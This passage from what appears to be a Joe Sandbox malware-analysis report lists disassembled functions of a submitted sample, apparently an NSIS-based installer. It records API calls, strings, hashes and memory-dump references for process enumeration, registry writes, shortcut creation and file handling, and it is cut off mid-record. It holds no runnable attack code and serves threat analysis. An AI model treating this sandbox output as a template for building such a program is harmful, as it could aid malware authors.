                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: CreateInstance
                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                    • API String ID: 542301482-1377821865
                                    • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                    • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                    • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                    • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                    Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: FileFindFirst
                                    • String ID:
                                    • API String ID: 1974802433-0
                                    • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                    • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                    • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                    • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                    Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                    • API String ID: 20674999-2124804629
                                    • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                    • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                    • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                    • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                    Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                    • ShowWindow.USER32(?), ref: 004054D2
                                    • DestroyWindow.USER32 ref: 004054E6
                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                    • EnableWindow.USER32(?,?), ref: 0040573C
                                    • EnableWindow.USER32(?,?), ref: 00405757
                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                    • String ID: @rD
                                    • API String ID: 184305955-3814967855
                                    • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                    • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                    Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                    • GetSysColor.USER32(?), ref: 004041AF
                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                    • lstrlenW.KERNEL32(?), ref: 004041D6
                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                    • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                    • SendMessageW.USER32(00000000), ref: 00404251
                                    • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                    • SetCursor.USER32(00000000), ref: 004042D2
                                    • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                    • SetCursor.USER32(00000000), ref: 004042F6
                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                    • String ID: @%F$N$open
                                    • API String ID: 3928313111-3849437375
                                    • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                    • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                    • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                    • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                    Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                    • wsprintfA.USER32 ref: 00406B4D
                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                    • String ID: F$%s=%s$NUL$[Rename]
                                    • API String ID: 565278875-1653569448
                                    • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                    • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                    • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                    • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                    Download Yara Rule
                                    APIs
                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                    • BeginPaint.USER32(?,?), ref: 00401047
                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                    • DeleteObject.GDI32(?), ref: 004010F6
                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                    • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                    • DeleteObject.GDI32(?), ref: 0040116E
                                    • EndPaint.USER32(?,?), ref: 00401177
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                    • String ID: F
                                    • API String ID: 941294808-1304234792
                                    • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                    • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                    • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                    • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                    Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                    • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    Strings
                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                    • API String ID: 1641139501-220328614
                                    • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                    • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                    • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                    • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                    Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                    Strings
                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                    • String ID: created uninstaller: %d, "%s"
                                    • API String ID: 3294113728-3145124454
                                    • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                    • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                    • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                    • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                    Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                    • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                    • API String ID: 3734993849-2769509956
                                    • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                    • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                    • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                    • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                    Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                    • GetSysColor.USER32(00000000), ref: 00403E00
                                    • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                    • SetBkMode.GDI32(?,?), ref: 00403E18
                                    • GetSysColor.USER32(?), ref: 00403E2B
                                    • SetBkColor.GDI32(?,?), ref: 00403E3B
                                    • DeleteObject.GDI32(?), ref: 00403E55
                                    • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
